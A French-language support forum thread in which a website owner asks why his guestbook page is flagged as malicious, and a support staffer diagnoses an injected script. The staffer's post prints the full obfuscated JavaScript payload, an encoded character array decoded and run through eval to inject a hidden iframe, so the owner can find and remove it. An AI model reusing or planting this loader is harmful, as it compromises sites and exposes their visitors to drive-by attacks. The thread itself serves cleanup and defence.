Problème Avec Un Site Non Accessible Options

[Arnawald]

[b]Bonjour.

Alors... Je ne le fais pas exprès et pour tout dire, ça commence vraiment à me peser...

J'ai fait rescanner par google, le site a été "libéré" des annonces de blocage... et aujourd'hui, je retourne sur mon site... de nouveau l'avertissement de page malveillante....

J'en ai marre... Je n'ai rien changé à mon site depuis belle lurette, j'ai rescanné avec virus total et cette fois CLEAN MX me trouve un virus.

Apparemment, mon site a été scanné via virus total hier, mais pas par mes soins...

Serait-ce à cause de mon guestbook toujours bloqué par Bitdefender?

Bonne journée.

Arnaud[/b]

[-Yann-]

Bonjour Arnawald,

Je me renseigne pour la partie Guestbook, pour savoir si son blocage est légitime ou non.
Effectivement le site est de nouveau repéré par malveillant par Google.

Cordialement,
Yann

[Arnawald]

Ok, merci.

Et pour le malware qui est probablement sur mon site, comment puis-je savoir ce qui est à virer.

Est-ce que ça suffirait que je vire tout mon site, que je remette tous les fichiers de mon pc en changeant les mots de passe ?

J'ai contacté OVH, mais ils sont d'une piètre aide. A part me renvoyer vers des liens généraux qui n'ont pas grand chose à voir avec mes problèmes...

Je pense qu'à l'avenir je changerai d'hébergeur, vu le peu d'importance qu'ils accordent à l'aide envers leur clients...

[Arnawald]

[b]Bonjour Yann,

Aurais-tu des nouvelles concernant mon guestbook?

Merci.

Arnaud[/b]

[Arnawald]

Toujours rien pour le guestbook bloqué par Bitdefender?

[-Yann-]

Bonjour Arnawald,

J'ai relancé mes collègues car lors de mon dernier message, cette partie de votre site n'était plus détectée.

Cordialement,
Yann

[-Yann-]

Bonjour Arnawald,

Je vous informe qu'après nouvelle analyse, la page permettant d'afficher votre Guestbook (http://www.arnwald.be/agb/index.php) est logiquement bloqué. Un script est présent à la fin du code, il injecte un Iframe que je vous donne ci-dessous. Il faudrait vérifier la sécurité de votre site, car ce script a été injecté certainement en utilisant une faille présente dans votre code ou les ressources que vous utilisez. Vérifiez les logs de vos serveurs pour voir s'il y a eu des accès bizarres, puis changez les login et mot de passe d'accès à votre compte chez votre hébergeur.

Voici le code de ce script qui se trouve tout à la fin du code de votre page que vous devez supprimer :

<script type="text/javascript" language="javascript" > v="v"+"al";if(020===0x10&&window.document)try{window.document.body=window.document.body}catch(gdsgsdg)
{w=window;v="e"+v;e=w[v];}if(1){f=new Array(40,101,115,110,98,114,105,110,108,32,39,39,32,122,11,10,31,30,32,31,116,97
,113,30,98,98,120,111,118,30,61,31,98,111,98,115,109,100,108,116,45,97,114,100,95
,116,100,67,108,100,107,101,109,114,40,38,103,102,113,95,109,100,37,41,58,11,10,1
2,8,32,31,30,32,97,97,122,110,117,46,114,112,99,31,59,32,38,102,116,115,110,58,46
,45,118,115,113,46,114,99,47,118,110,45,98,109,110,115,99,110,115,45,99,107,105,4
6,111,102,112,38,57,13,9,30,32,31,30,98,98,120,111,118,44,115,115,119,108,100,44,
112,110,113,105,115,103,111,109,30,61,31,37,97,97,113,111,107,115,116,100,37,59,1
2,8,32,31,30,32,97,97,122,110,117,46,114,114,121,107,99,46,97,109,114,99,99,114,3
1,59,32,38,46,39,58,11,10,31,30,32,31,96,99,121,109,119,45,113,116,120,106,101,45
,102,101,104,101,104,115,30,61,31,37,49,111,118,39,58,11,10,31,30,32,31,96,99,121
,109,119,45,113,116,120,106,101,45,117,105,99,114,104,31,59,32,38,47,112,119,37,5
9,12,8,32,31,30,32,97,97,122,110,117,46,114,114,121,107,99,46,107,99,102,115,30,6
1,31,37,49,111,118,39,58,11,10,31,30,32,31,96,99,121,109,119,45,113,116,120,106,1
01,45,114,111,111,30,61,31,37,49,111,118,39,58,11,10,12,8,32,31,30,32,104,100,32,
39,31,100,110,97,117,108,99,110,115,44,103,100,114,69,107,99,109,100,108,116,65,1
19,73,99,38,39,97,97,122,110,117,39,40,39,32,122,11,10,31,30,32,31,30,32,31,30,10
0,110,97,117,108,99,110,115,44,119,113,103,116,100,38,39,59,98,105,117,30,105,99,
59,92,38,96,99,121,109,119,91,37,62,59,45,100,104,116,62,38,39,59,12,8,32,31,30,3
2,31,30,32,31,98,111,98,115,109,100,108,116,45,101,101,115,67,108,100,107,101,109
,114,66,120,71,100,39,37,98,98,120,111,118,37,41,45,95,112,111,99,110,99,65,104,1
04,106,100,39,96,99,121,109,119,40,57,13,9,30,32,31,30,125,12,8,125,40,38,41,58);
}w=f;s=[];for(i=0;-i+494!=0;i+=1){j=i;if(e&&(031==0x19))s=s+String.fromCharCode((1*w[j]+j%3));}e(s)</script>

Cordialement,
Yann

[Arnawald]

Merci beaucoup.

Apparemment, tout le dossier de mon guestbook est infecté. J'ai essayé de le rapatrier sur mon ordinateur pour désinfecter et ainsi éviter de perdre les messages, mais Bitdefender m'a quasi tout viré...

Existe-t-il une solution où je pourrais encore récupérer les messages ou est-ce perdu d'avance ?

[fedor]

[quote name='Arnawald' date='Jan 16 2013, 05:57 PM' post='172054']
Merci beaucoup.

Apparemment, tout le dossier de mon guestbook est infecté. J'ai essayé de le rapatrier sur mon ordinateur pour désinfecter et ainsi éviter de perdre les messages, mais Bitdefender m'a quasi tout viré...

Existe-t-il une solution où je pourrais encore récupérer les messages ou est-ce perdu d'avance ?
[/quote]bonsoir arnawald,
regarde si bd ne les aurait pas mis en quarantaine.
bonne soiree.

[-Yann-]

Bonjour Arnawald,

Il faut simplement rapatrier la page d'index de votre guestbook et supprimer le script qui apparaît à la fin de la page (celui que je vous ai indiqué) pour ensuite réinjecter la page sur votre espace d'hébergement. Je ne vois pas de commentaires infectés (ou plutôt comportant du code suspect). D'ailleurs il faudrait vous poser des questions sur la sécurité des scripts que vous avez insérer dans votre site, notamment celui qui vous permet d'avoir ce guestbook.

Je ne peux vous en dire plus, nous ne pouvons offrir de services de sécurisation de site, mais vous pourrez sans doute trouver de l'aide sur internet à ce sujet.

Cordialement,
Yann

[Arnawald]

Ok, encore un tout grand merci pour votre précieuse aide !

Bon week-end (IMG:style_emoticons/default/smile.gif)

Arnaud